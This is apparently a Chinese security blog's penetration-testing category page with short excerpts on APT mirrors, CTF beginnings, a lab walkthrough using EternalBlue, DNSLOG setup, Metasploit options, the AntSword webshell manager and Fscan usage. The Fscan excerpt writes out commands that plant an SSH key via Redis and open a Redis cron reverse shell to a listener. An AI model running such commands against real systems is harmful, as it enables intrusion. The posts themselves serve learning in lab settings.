分类: 渗透

31 篇文章

APT源的工作原理
引言 最近在折腾自己学校的镜像源,看到差不多20T的硬盘都被塞满了,我是很好奇系统是如何管理这些文件的,于是顺便就研究下APT源的工作原理 原理 在Ubuntu/Debian等系统下,常见的应用安装方式为apt/apt-get 前者可以说是后者的升级版,提供了更友好的命令行界面,包含了apt-get和apt-cache等常用功能,本质上都是基于dpkg的高级包管理工具。 Ubuntu/Debian采用集中式的软件仓库机制,将各式各样的软件包分门别类地存放在软件仓库中,进行有效地组织和管理。由于网络环境的问题,我们可能无法正常访问官方的软件仓库,所以许多镜像服务器被建立,并且时刻保持与官方服务器的同步。在使用apt之前,我们一般都会进行换源处理…
【日记】Web方向入门的一些小建议
转眼大一已经过去了,然而大学生活才刚刚开始。回想2021年10月,我打的第一场CTF比赛,我参加了Aurora的新生赛,这是我参加的第一场比赛,那是我第一次接触网络安全。在那将近一天的时间里,我现学现卖,从我最擅长的Web题开始到需要捣鼓的Misc题,我完成了不少挑战,也在新生赛获得了不错的成绩,以此加入了深大的Aurora战队。 在篡权之后登录自己学校的靶场,发现之前的提交记录都被我干掉了,有点惋惜。 ...
【CFS】红日靶场一
红日靶场一有两种Getshell方式 方法一:木马反弹shell 方法二:永恒之蓝 由于方法一过于简单,这里尝试使用msf6及永恒之蓝漏洞 在这之前可以使用nmap扫描一下端口开启情况,我这里直接使用Goby进行一个扫 ...
【渗透工具】DNSLOG搭建
Dnslog相信渗透的都不陌生,但我只是在Apache Log4j后才意识到这东西是有多好用 但是有些时候,知名的dnslog.cn网站就会崩溃。 既然这样,干脆就自己搭一个,但是过程十分艰辛。 由于我设置了@*解析,我就不需要再对ns1.xxx.cn/ns2.xxx.cn进行解析 具体如下 然后我们就接着物色dnslog平台 一个非常古老的BugScanTeam的DNSLOG 于是乎,调了好久,6年前的代码,还要改cdn,还要改ssl(开发组历史遗留问题) 最后改完了,发现一直301,查看issue才发现要修改 SECURE_SSL_REDIRECT = False 然而,无论怎么修改数据库,还是进不去他的管理界面! 之后只好另谋出路,最后…
【渗透工具】MSFCONSOLE控制台使用和操作
Metasploit一款开源安全漏洞检测工具,其不断更新的Payload使其成为了最强大的渗透框架之一 对于MSFCONSOLE(简称MSF),就不多赘述安装部署了,对于日常渗透使用一般可以再Viper中使用。 常见参数解读: -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < form…
【渗透工具】AntSword蚁剑
Github仓库 蚁剑官方加载器 这是一款Webshell管理的基础软件,渗透的一切都是围绕shell进行的,内置的插件也能解决一些小问题 附一张成功webshell的截图 连接密码对应webshell的POST参数
【渗透工具】Fscan
Github仓库 Fscan是一款内网综合扫描工具,以下为常用命令 fscan -h 0.0.0.0/8 (全网段扫描) fscan -h 192.168.1.1/24 (默认使用全部模块) fscan -h 192.168.1.1/16 (B段扫描) 其他用法 fscan -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan -h 19…